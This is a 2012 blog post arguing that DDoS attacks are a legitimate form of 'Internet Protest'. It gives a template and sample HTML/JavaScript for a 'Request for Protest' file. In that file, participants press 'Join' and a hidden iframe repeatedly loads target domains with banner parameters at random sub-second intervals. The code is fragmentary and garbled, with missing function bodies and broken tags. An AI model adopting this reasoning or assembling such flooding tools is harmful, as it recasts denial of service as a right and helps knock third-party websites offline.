Saturday, May 19, 2012

Your right , your power

You can make a protest in real world , but how do think if you also can do it in the virtual world.

Protest is your right

Thus, protect your right and keep demonstrating your power.


Protest definition in Wikipedia
A protest is an expression of objection, by words or by actions, to particular events, policies or situations. Protests can take many different forms, from individual statements to mass demonstrations. Protesters may organize a protest as a way of publicly making their opinions heard in an attempt to influence public opinion or government policy, or they may undertake direct action in an attempt to directly enact desired changes themselves.[1] Where protests are part of a systematic and peaceful campaign to achieve a particular objective, and involve the use of pressure as well as persuasion, they go beyond mere protest and may be better described as cases of civil resistance or nonviolent resistance.[2]
Various forms of self-expression and protest are sometimes restricted[3] by governmental policy, economic circumstances, religious orthodoxy, social structures, or media monopoly. When such restrictions occur, protests may assume the form of open civil disobedience, more subtle forms of resistance against the restrictions, or may spill over into other areas such as culture and emigration.
A protest can itself sometimes be the subject of a counter-protest. In such a case, counter-protesters demonstrate their support for the person,policy, action, etc. that is the subject of the original protest....

What is Internet Protest

Internet Protest is a protest , that performed in Internet environment.

How do we protest

Yes, I just want to tell you the fact , we will use this  technique  to demonstrate our protest.

You dont agree , why ? that just an attack way, because some bad  bastards used it to against someone, to make extortion ..., thus we mark it as a a bad , a black , a devil thing and we should not use it. Dont you think it is a stupid thought ???

Why dont we use this attack as our power for our protest.

The real protest is also a "attack" in nature, it prevent the normal flow of  business work of company,party and service ... it attract the public and cause the big pressure to responsible party , such as government  for appropriate changes.

So as same as the real protest ,  the Internet Protest is also a attack ,but a DDOS attack, that processed by  us follow an agreement and of course , we only accept joining a reasonable protest , so think carefully for a protest join.

For participant safe, the Protest way is simple concurrent auto visit of participant with banners to target web domains to which we should bring pressure.

The author will create a Request for Protest in order to raise the protest.

What is Request for Protest

Request for Protest (RFP) is a file , only one file that used as the mean for  protest.

The file is html-javascript only source and should be clearly understandable , no trick or hidden script that can harm user should be exist within any reason.

Content layout is simple as follow
Agreement : section where author write agreement about protest ,such as start-time,end-time, ... the condition for a successful protest
Reason : the section describe all reasons convince the reader to join the protest
Targets :  the section describe target domains of protest , and banner name,content you want to send to the target 
Action : the section that contain controls of processing protest 

How to join the protest

After take a careful thought about the protest , and if you decide to join the protest , make sure you check the file RFP carefully , ( or should download the file from trusted-host ).

Simply click button "Join" when the start-time of protest is up . Then you can keep working as usual , the auto-mechanism will raise banner messages to targets .

Sample Source of  RFP

Copy as plain text file,saved with html extension and open with browser, and enjoy your right
<title>Request for Protest</title>
<script type="text/javascript">

var areaTarget=document.getElementById('Target');
var arr=areaTarget.value.split('\n');
for (var i in arr)
if (arr[i]=="") continue;


if (window.IsStop) return;

if (window.TargetID >= window.TargetUrls.length) window.TargetID=0;

var ifr=document.getElementById('ifr');

var url=window.TargetUrls[window.TargetID+""];
if (window.IsNoBanner==true) url=url.split("?")[0];

var next=parseInt(Math.random()*1000)+500;

var status=document.getElementById('status');
status.innerHTML="Attemps : "+window.ProtestCount;




<b>The agreement</b>

<b>Reason of protest</b>

<textarea id="Target" style='height:200px;width:100%' disabled>
{web domain 1}?{Banner name 1}="{Banner content 1}" & {Banner name 2}="{Banner content 2}"
{web domain 2}?{Banner name 1}="{Banner content 1}" & {Banner name 2}="{Banner content 2}"

<input type="checkbox" onclick="window.IsNoBanner=this.checked;alert(this.checked);" /> <span>No Banner</span>
<input type="button" value="Join" onclick="InitProtest();" style="padding:10px" />
<input type="button" value="Stop" onclick="window.IsStop=true;" style="padding:10px" />
<div id='status'>


<iframe id='ifr' style='display:none'/>

